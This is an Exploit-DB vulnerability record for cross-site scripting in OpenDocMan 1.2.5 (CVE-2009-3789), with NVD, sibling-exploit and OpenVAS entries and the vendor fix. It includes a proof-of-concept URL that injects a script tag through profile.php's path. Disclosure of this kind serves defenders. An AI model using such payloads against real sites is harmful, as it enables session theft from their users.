ID: EDB-ID:33301
Type: exploitdb
Reporter: Amol Naik
Modified: 2009-10-21T00:00:00
Description: OpenDocMan 1.2.5 profile.php XSS. CVE-2009-3789. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/36777/info
OpenDocMan is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OpenDocMan 1.2.5 is vulnerable; other versions may also be affected.
http://www.example.com/opendocman/profile.php/"><script>alert(1)</script>
Related records attached to this bulletin (NVD, ExploitDB and OpenVAS entries):

CVE-2009-3789 (NVD, published 2009-10-26, CVSS 4.3, AV:N/AC:M/Au:N/C:N/I:P/A:N): Multiple cross-site scripting (XSS) vulnerabilities in OpenDocMan 1.2.5 allow remote attackers to inject arbitrary web script or HTML via the last_message parameter to (1) add.php, (2) toBePublished.php, (3) index.php, and (4) admin.php; the PATH_INFO to the default URI to (5) category.php, (6) department.php, (7) profile.php, (8) rejects.php, (9) search.php, (10) toBePublished.php, (11) user.php, and (12) view_file.php; and (13) the caller parameter in a Modify User action to user.php.

Sibling ExploitDB entries for the same advisory (all CVE-2009-3789, published 2009-10-21, CVSS 4.3):
EDB-ID:33295 OpenDocMan 1.2.5 add.php last_message Parameter XSS
EDB-ID:33296 OpenDocMan 1.2.5 toBePublished.php Multiple Parameter XSS
EDB-ID:33297 OpenDocMan 1.2.5 index.php last_message Parameter XSS
EDB-ID:33298 OpenDocMan 1.2.5 admin.php last_message Parameter XSS
EDB-ID:33299 OpenDocMan 1.2.5 category.php XSS
EDB-ID:33300 OpenDocMan 1.2.5 department.php XSS
EDB-ID:33302 OpenDocMan 1.2.5 rejects.php XSS
EDB-ID:33303 OpenDocMan 1.2.5 search.php XSS
EDB-ID:33304 OpenDocMan 1.2.5 user.php XSS
EDB-ID:33305 OpenDocMan 1.2.5 view_file.php XSS

OpenVAS checks OPENVAS:900885 and OPENVAS:1361412562310900885 ("OpenDocMan Multiple XSS and SQL Injection Vulnerabilities", SecPod, created 2009-10-29; covers CVE-2009-3788, CVE-2009-3789 and CVE-2009-3801; BID 36777; CVSS 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P):
Affected: OpenDocMan versions prior to 1.2.5.2.
Insight: input passed to the 'frmuser' and 'frmpass' parameters in index.php is not properly sanitised before being used in SQL queries; input passed to the 'last_message' parameter in add.php, toBePublished.php, index.php and admin.php, and input passed via the URL to category.php, department.php, profile.php, rejects.php, search.php, toBePublished.php, view_file.php and user.php, is not properly sanitised before being returned to the user.
Solution (vendor fix): upgrade to OpenDocMan version 1.2.5.2 or later.
References: http://secunia.com/advisories/30750/, http://xforce.iss.net/xforce/xfdb/53886, http://www.packetstormsecurity.org/0910-exploits/opendocman-sqlxss.txt